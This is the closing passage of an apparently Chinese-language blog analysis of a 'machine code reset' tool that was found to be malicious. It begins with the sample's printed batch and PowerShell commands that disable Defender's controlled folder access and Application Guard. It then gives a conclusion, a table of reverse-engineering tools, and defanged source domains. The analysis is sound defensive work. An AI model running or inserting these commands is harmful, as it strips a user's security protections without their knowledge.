ecurity" /t REG_DWORD /d 0 /f:: ??PowerShell??????powershell -command "Set-MpPreference -EnableControlledFolderAccess Disabled" >nul 2>&1powershell -command "Disable-WindowsOptionalFeature -Online -FeatureName Windows-Defender-ApplicationGuard -NoRestart" >nul 2>&1echo ?????!echo ???:??????,???????????echo.pause
总结

到这里就分析结束了，该程序为层层打包不同来源的小工具制成，从整体行为上来看，确实符合公众号中描述的那样，为机器码重置工具。但其实际执行的行为与恶意软件攻击中的防御规避行为极其一致，且均为关闭安全机制的行为，因此被判黑。不过在这里还是要提醒大家，尽可能去寻找可信来源的软件下载，并尽可能多的了解软件行为，避免因为这类软件对自己的机器造成损害后无法挽回。
工具与涉及网站整理

以下是文章中涉及的全部工具与相关网址的整理汇总：
分析工具工具名称用途获取地址Detect It Easy (DIE)查壳、识别编译器/打包器类型horsicq/Detect-It-EasyPEbearPE 文件结构分析，查看各段数据hasherezade/pe-bearVirusTotal多引擎在线查杀 + 沙箱行为分析virustotal.cominnoextract解包 Inno Setup 打包的安装程序dscharrer/innoextractAutoIt-Ripper解包 AutoIt 编译的可执行文件，还原 .au3 脚本nazywam/AutoIt-RipperUPXUPX 壳的脱壳工具（3.96 版本）upx/upxProcess Monitor监控进程、文件、注册表等系统行为Microsoft Sysinternals
样本溯源相关网址名称说明原帖样本来源帖子，贴主疑似发现病毒Gitee 项目说明文档由字符串溯源找到的项目仓库，指向 QQ 群与付费服务网站jiqima[.]org提供机器码重置付费服务的网站，由 Gitee 文档关联facenb[.]com另一家提供机器码重置服务的网站，由 Yel.exe 的微云链接关联share.weiyun[.]com/S6N5U5Y3Yel.exe 联网访问的腾讯微云链接，内容为软件使用说明文档rjno1[.]com/turn-off-uac/2.exe（关闭 UAC 工具）的原始来源软件站，Hash 完全一致xyboot[.]com/rzddnyzqpakngycuvpyrqphqymrfxcxeefcnmwmcaitfgmkdikeyquqvstrcdwti/4.exe（AutoIt 脚本打包）的原始来源页面，Hash 不一致，推测为旧版本
VirusTotal 样本分析页样本链接Yel.exe 行为分析virustotal.com - Yel.exe